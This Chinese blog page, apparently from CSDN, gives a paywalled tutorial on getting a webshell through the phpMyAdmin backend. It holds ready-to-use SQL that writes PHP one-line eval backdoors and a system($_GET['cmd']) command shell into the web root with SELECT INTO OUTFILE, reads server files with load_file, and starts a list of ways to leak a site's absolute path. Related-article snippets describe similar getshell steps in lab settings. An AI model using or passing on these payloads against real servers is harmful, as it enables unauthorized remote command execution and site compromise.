phpmyadmin后台

最新推荐文章于 2025-10-20 09:45:00 发布
原创 最新推荐文章于 2025-10-20 09:45:00 发布 · 1.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#PHP #后台

本文介绍了多种利用PHP在数据库中创建、读取和导出文件的方法,如通过CREATE TABLE、INSERT INTO、SELECT INTO OUTFILE等SQL语句。此外,还列举了不同场景下的路径爆破技术,包括通过URL参数、错误信息、配置文件、PHPmyadmin等途径获取服务器路径信息。这些方法展示了如何在合法操作和恶意攻击中使用PHP。

方法一:
CREATE TABLE mysql.xiaoma (xiaoma1 TEXT NOT NULL );
INSERT INTO mysql.xiaoma (xiaoma1 )VALUES (’<?php @eval($_POST[xiaoma])?>’);
SELECT xiaomaFROM study INTO OUTFILE ‘E:/wamp/www/7.php’;
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
一句话连接密码:xiaoma

方法二:
Create TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES(’<?php eval($_POST[xiaoma])?>’);
select xiaoma1 from xiaoma into outfile ‘E:/wamp/www/7.php’;
Drop TABLE IF EXISTS xiaoma;

方法三:

读取文件内容: select load_file(‘E:/xamp/www/s.php’);

写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE ‘E:/xamp/www/xiaoma.php’

cmd执行权限:select ‘<?php echo \'

\';system($_GET[\'cmd\']); echo \'
\'; ?>’ INTO OUTFILE ‘E:/xamp/www/xiaoma.php’

方法四:
select load_file(‘E:/xamp/www/xiaoma.php’);

select ‘<?php echo \'

\';system($_GET[\'cmd\']); echo \'
\'; ?>’ INTO OUTFILE ‘E:/xamp/www/xiaoma.php’
然后访问网站目录: http://www.xxxx.com/xiaoma.php?cmd=dir

php爆路径方法收集 :

1、单引号爆路径
说明:
直接在

最低0.47元/天 解锁文章
Coisini、
关注
【getshell】phpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 1108
访问一下 最后getshell
墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)
曹振国的博客
06-15 5732
phpMyAdmin第一种:一、利用burp爆破出账号密码二、尝试写马连入蚁剑1.发现MySQL对导入导出没做任何限制2.查询日志3.利用日志写文件4.访问写入的日志文件6.尝试直接通过into outfile写入一句话木马7.访问phpinfo文件,并连接蚁剑得到key值第二种:一、下载index.php文件进行分析1.发现55到63行存在问题二、下载Core.php进行分析1.找到checkPageValidity函数,在第443行2.查看白名单数组$whitelist3.包含根目录下的key.txt得
phpMyAdmin后台文件包含分析溯源
asd158923328的博客
08-20 1565
靶场地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 根据题意 进入访问页 弱口令进入,账号root,密码root 进入SQL执行 使用菜刀连接服务器 在根目录下我们发现key.txt文件 打开查看 ...
phpmyadmin后台4种拿shell方法及php爆路径收集
weixin_30367873的博客
08-31 1284
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
免费开源!一款操作 MySQL 和 MariaDB 的 Web 界面工具!
最新发布
weixin_43400476的博客
10-20 1236
phpMyAdmin —— 一个免费开源、基于 PHP 的 MySQL/MariaDB 数据库管理 Web 工具,通过提供一个直观的图形用户界面,来执行大多数数据库管理任务。
第三方应用类---Phpmyadmin 后台 Getshell 操作
金灰的博客
04-21 730
以Web-Base方式架构在网站主机上的MySQL的数据库管理工具.PhpMyAdmin_百度百科。
phpmyadmin后台getshell( 4.8.5)
qq_61740845的博客
09-11 657
然后去浏览器访问一些我们文件,可以成功访问就可以使用远控(中国蚁剑)getshell了。然后改变它的日志存储位置方便上马(要根据实际情况更改路径)然后通过查询我们的一句话使日志里面出现我们的一句话。
墨者学院-入门级-phpMyAdmin后台文件包含分析溯源-小白必看(超详细)
kitiu666的博客
01-26 1707
2021年1月26日,第六次渗透测试。 实在抱歉,因为工作原因许久没有更新测试,期间生活也发生了很多事,现在心情也不怎么好,但也尽量讲细一点吧,开干! 准备需求: 1、win10系统; 2、中国菜刀; 1、进入靶场 账号:root 密码:root 这个账号密码都是看其他的教程知道的,至于怎样破解出来不知道,能力有限,过后我看看怎么来的吧。(如果了解再回来追跟); 2、进入到后台,到SQL页面,在控制台下输入以下命令,然后点击执行; select ‘<?php eval($_POST[key
phpMyAdmin后台getshell复现
09-18
本教程详细介绍了如何通过phpMyAdmin后台实现getshell复现。首先,需要通过弱口令等方法获得phpMyAdmin的登录权限。一旦登录后,攻击者可以利用phpMyAdmin的日志记录功能来执行特定的操作,进而实现getshell。具体...
精选资源
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
PHP爆绝对路径方法
qax
10-06 1258
1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 www.xxx.com/news.php?id=149′ 2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。 www.xxx.com/researcharchive.php?id=-1 3、Google爆路径 说明: 结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
PHP爆绝对路径方法收集
07-24
PHP爆绝对路径方法收集,可以学习一下啊,比较全面了
PhpMyAdmin后台getshell
qq_50854662的博客
03-14 1294
PhpMyAdmin简介 PhpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。 在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录(可试下:http://ip:端口/phpmyadmin/ )时,进而通过弱口令(可以直接尝试下账号root密码root)或者暴力破解进入管理后台之后,有
php爆绝对路径方法
KHOST的博客
03-16 492
1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: www.xxxxxx.com/news.php?id=149' 2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg: www.xxxxxxxxx.com/researcharch...
PhpMyadmin利用Mysql root密码获取webshell
weixin_33739523的博客
05-23 272
Simeon   Phpmyadmin是一款著名的mysql在线管理系统,通过提供的mysql数据库用户账号和密码对所管理的数据库实施操作。在***过程中,一旦获取其mysql账号和对应的密码,轻者获取其账号所管理数据库,重者可以配合其它漏洞获取webshell权限和系统权限。Root账号及口令可以通过暴力破解,源代码泄露等途径获取,本文主要就其root账号获取以及phpmyadmin的利用、如何...
php爆绝对路径的几种方法
weixin_30755709的博客
03-27 356
WordPress的平台,爆绝对路径的 方法是:url/wp-admin/includes/admin.phpurl/wp-content/plugins/akismet/akismet.phpurl/wp-content/plugins/akismet/hello.phpphpMyAdmin暴路径办法:phpMyAdmin/libraries/select_lang.lib.phpphpMyA...
php 获取绝对路径,thinkphp怎么获取绝对路径
weixin_35980011的博客
03-10 2128
用Jsp获取、用Java类获取或用servlet获取项目绝对路径。一、用Jsp获取1、获取文件的绝对路径String file="文件";(例如:data.mdb)String path=application.getRealPath(file);2、获取文件的绝对路径String p2=request.getRequestURI();3、获取当前jsp页面的路径String p3=request...
复现phpmyadmin后台getshell
09-12
复现phpMyAdmin后台GetShell通常指的是利用phpMyAdmin的漏洞执行未授权的代码,从而获得对服务器的控制。这通常需要以下条件: 1. 存在已知漏洞:首先,phpMyAdmin需要存在可以被利用的已知安全漏洞。这可能是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值